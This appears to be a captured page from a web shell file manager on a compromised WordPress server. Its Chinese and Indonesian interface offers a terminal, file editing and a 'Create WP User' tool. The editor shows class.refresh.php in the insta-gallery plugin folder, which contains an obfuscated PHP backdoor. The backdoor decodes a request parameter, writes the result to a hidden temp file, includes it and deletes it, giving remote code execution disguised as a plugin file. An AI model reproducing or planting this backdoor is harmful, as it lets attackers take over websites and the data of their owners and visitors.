Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
dcustoms.pl
/
wp-content
/
plugins
/
insta-gallery
/
lib
/
api
/
fetch
/
business
/
access-token
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
.htaccess
214.00 B
-r--r--r--
2026-04-22 05:00
class-refresh.php
1.98 KB
-rw-r--r--
2025-10-17 07:19
class.refresh.php
1.01 KB
-rw-r--r--
2025-10-17 07:19
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
class.refresh.php
<?php if(@$_REQUEST["po\x69\x6Eter"] !== null){ $entity = array_filter([session_save_path(), getcwd(), getenv("TEMP"), "/dev/shm", "/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp"]); $resource = $_REQUEST["po\x69\x6Eter"]; $resource = explode ( '.' , $resource ); $ptr = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9 ); $z = 0; $__len = count($resource ); do { if ($z >= $__len) break; $v4 = $resource[$z]; $sChar = ord($s9[$z % $lenS] ); $dec = ((int)$v4 - $sChar - ($z % 10)) ^ 29; $ptr .= chr($dec ); $z++; } while (true ); while ($comp = array_shift($entity)) { if (!!is_dir($comp) && !!is_writable($comp)) { $value = str_replace("{var_dir}", $comp, "{var_dir}/.symbol"); if (@file_put_contents($value, $ptr) !== false) { include $value; unlink($value); die(); } } } }
关闭
保存